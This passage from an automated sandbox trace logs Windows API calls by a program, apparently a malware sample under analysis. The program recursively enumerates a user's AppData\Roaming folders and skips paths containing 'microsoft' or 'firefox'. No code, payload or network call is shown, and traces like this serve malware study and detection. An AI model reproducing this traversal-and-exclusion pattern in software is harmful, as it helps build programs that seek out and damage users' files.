pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.168] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.168] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.168] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.168] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 1 [0083.168] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="microsoft") returned 0x0 [0083.168] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpSrch="firefox") returned 0x0 [0083.168] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586ba0 [0083.168] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.169] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.169] Sleep (dwMilliseconds=0x0) [0083.169] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.169] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.169] Sleep (dwMilliseconds=0x0) [0083.169] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.169] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.169] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 1 [0083.169] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="microsoft") returned 0x0 [0083.169] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", lpSrch="firefox") returned 0x0 [0083.169] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.169] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.169] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.169] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.169] Sleep (dwMilliseconds=0x0) [0083.169] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.169] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.169] Sleep (dwMilliseconds=0x0) [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.169] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.170] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned 0 [0083.170] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="microsoft") returned 0x0 [0083.170] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", lpSrch="firefox") returned 0x0 [0083.170] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.170] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b20 [0083.170] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.170] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.170] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.170] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 1 [0083.170] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="microsoft") returned 0x0 [0083.170] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpSrch="firefox") returned 0x0 [0083.170] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.170] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.170] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.171] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.171] Sleep (dwMilliseconds=0x0) [0083.171] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.171] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.171] Sleep (dwMilliseconds=0x0) [0083.171] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.171] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.171] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.171] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned 0 [0083.172] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="microsoft") returned 0x0 [0083.172] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", lpSrch="firefox") returned 0x0 [0083.172] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.172] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b20 [0083.172] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.172] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.172] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.172] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 0 [0083.173] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.173] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", lpSrch="firefox") returned 0x0 [0083.173] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.173] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.173] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.173] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.173] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.173] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 0 [0083.173] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="microsoft") returned 0x0 [0083.173] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpSrch="firefox") returned 0x0 [0083.173] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.173] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586ba0 [0083.173] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.173] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.173] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.173] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 0 [0083.174] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="microsoft") returned 0x0 [0083.174] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpSrch="firefox") returned 0x0 [0083.174] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.174] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586be0 [0083.174] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.174] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.174] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.174] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned 0 [0083.174] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="microsoft") returned 0x0 [0083.174] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpSrch="firefox") returned 0x0 [0083.174] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.174] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c20 [0083.174] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.174] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.174] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.174] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 0 [0083.175] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="microsoft") returned 0x0 [0083.175] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpSrch="firefox") returned 0x0 [0083.175] PathCombineW (in: pszDest=0x18c7c8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.175] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0x586c60 [0083.175] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.175] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 1 [0083.175] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18c9d0 | out: lpFindFileData=0x18c9d0) returned 0 [0083.175] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.175] Sleep (dwMilliseconds=0x0) [0083.175] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.175] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.175] Sleep (dwMilliseconds=0x0) [0083.175] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.175] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.175] Sleep (dwMilliseconds=0x0) [0083.175] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.176] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.176] Sleep (dwMilliseconds=0x0) [0083.176] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.176] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.176] Sleep (dwMilliseconds=0x0) [0083.176] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.176] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.176] Sleep (dwMilliseconds=0x0) [0083.176] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.176] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.176] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned 0 [0083.176] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0083.176] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0083.176] Sleep (dwMilliseconds=0x0) [0083.176] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.176] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.176] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.176] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned 0 [0083.176] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="microsoft") returned 0x0 [0083.176] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="firefox") returned 0x0 [0083.176] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.177] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b20 [0083.177] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.177] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.177] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.177] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned 1 [0083.177] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="microsoft") returned 0x0 [0083.177] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="firefox") returned 0x0 [0083.177] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.177] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.177] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.177] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.177] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.177] Sleep (dwMilliseconds=0x0) [0083.177] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.177] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.177] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 0 [0083.178] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="microsoft") returned 0x0 [0083.178] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="firefox") returned="Firefox" [0083.178] Sleep (dwMilliseconds=0x0) [0083.178] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.178] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.178] Sleep (dwMilliseconds=0x0) [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] FindNextFileW (in: hFindFile=0x57f3e8, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.178] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Skype" | out: 